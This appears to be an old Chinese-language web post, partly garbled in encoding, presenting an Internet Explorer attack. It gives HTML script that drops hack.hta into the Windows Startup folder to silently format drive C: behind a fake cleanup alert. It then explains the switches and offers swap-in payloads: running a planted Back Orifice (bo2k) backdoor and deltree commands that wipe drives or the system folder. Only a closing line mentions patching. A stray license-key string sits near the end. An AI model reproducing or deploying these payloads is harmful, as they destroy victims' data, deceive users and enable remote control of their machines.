這是利用微軟( Microsoft )的IE瀏覽器( Internet Explorer )所衍生出來(lái)的 
攻擊方法。 

以下這段就是具有破壞性的HTML 

Hacking Your Computer . 

scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動(dòng)\\hack.hta"; 
scr.Doc=" 
wsh.Run('start.exe /m format c:/q /autotest /u'); 
alert('IMPORTANT : Windows is removing unused temporary files.');"; 
scr.write(); 


(懂HTML的人應(yīng)該就看得出來(lái)其中精隨) 

現(xiàn)在我大概來(lái)解釋其中幾個(gè)項(xiàng)目所寫(xiě)的意思 

scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動(dòng)\\hack.hta" 

這一項(xiàng)就是指當(dāng)你看到這網(wǎng)頁(yè)它會(huì)寫(xiě)入到你的電腦啟動(dòng)目錄底下，并命名為 
hack.hta 

wsh.Run('start.exe /m format c:/q /autotest /u'); 

通常要格式化硬碟都會(huì)先問(wèn)你是否要執(zhí)行，但其中的"/autotest"這項(xiàng)。 

它是一個(gè)微軟沒(méi)有公開(kāi)的功能，鍵入後format的動(dòng)作便會(huì)被強(qiáng)制執(zhí)行。 

這項(xiàng)中的/q /u是令系統(tǒng)不需要檢查硬碟便會(huì)立即執(zhí)行的指令。 

最後start.exe再配合/m選項(xiàng)可以使format的DOS-prompt視窗在執(zhí)行的時(shí)候處?kù)蹲钚?nbsp;
化的狀態(tài)。 

執(zhí)行其他攻擊指令的方法∶ 

只要修改“start.exe /m format c:/q /autotest /u”這一項(xiàng)便形。 

start.exe /m format c:/q /autotest /u 

其中的“c:”可以換做其他的硬碟。 

(path)\bo2k.exe 

執(zhí)行它電腦中的某個(gè)程式，如果你有傳bo2k到它電腦中就可以使用此指令。 

start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 

殺掉對(duì)方硬碟底下所有的檔案。 

start.exe /m deltree /y c:\windows\system\*.* 

殺掉對(duì)方c:\windows\system\目錄底下的所有檔案。 

後敘∶ 

預(yù)防遭此手段的破壞就是到微軟去更新你的瀏覽器。 
cplic putlic eval 01Oct2001 ao9McpUFF-LvJU5BvTp-7xDVpSa4X-RrrcKpv jjCPSUITE-EVAL-3DES-NG CK-CP 

最新評(píng)論